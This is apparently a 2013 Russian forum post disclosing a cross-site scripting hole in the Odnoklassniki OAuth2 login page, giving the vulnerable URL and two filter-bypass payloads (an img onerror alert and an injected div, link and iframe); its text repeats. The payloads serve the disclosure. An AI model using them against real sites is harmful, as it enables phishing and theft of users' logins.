добрый день .
уязвимость заключается в слабой фильтрации полей при авторизации.
вот ссылкаhttp://www.odnoklassniki.ru/dk?st.cmd=OAuth2Login&st.redirect=0
при вводе этих тегов фильтры их пропускают
или можно даже вставить iframe с ссылкой на любой сайт
некоторые приложение используют эту ссылку для авторизации через социальные сети например badoo.com
в целом можно добавлять даже кнопки!!!
всем спасибо за внимание!!!
уязвимость заключается в слабой фильтрации полей при авторизации.
вот ссылка
при вводе этих тегов фильтры их пропускают
Код |
---|
<style><img src="</style><img src="http://cdn1.image.tube8.phncdn.com/201305/15/11620611//190x143/2.jpg" onerror=alert(1)//"> |
или можно даже вставить iframe с ссылкой на любой сайт
Код |
---|
<div draggable="true" ondragstart="alert();"> <h1><a href = "http://www.securitylab.ru/forum/topic/add/forum16/">НАЖМИ НА МЕНЯ</a></h1> </div> ><iframe src="jfyhjhyvhj"></iframe> |
некоторые приложение используют эту ссылку для авторизации через социальные сети например badoo.com
в целом можно добавлять даже кнопки!!!
всем спасибо за внимание!!!
Изменено: niko.lol - 03.06.2013 14:17:51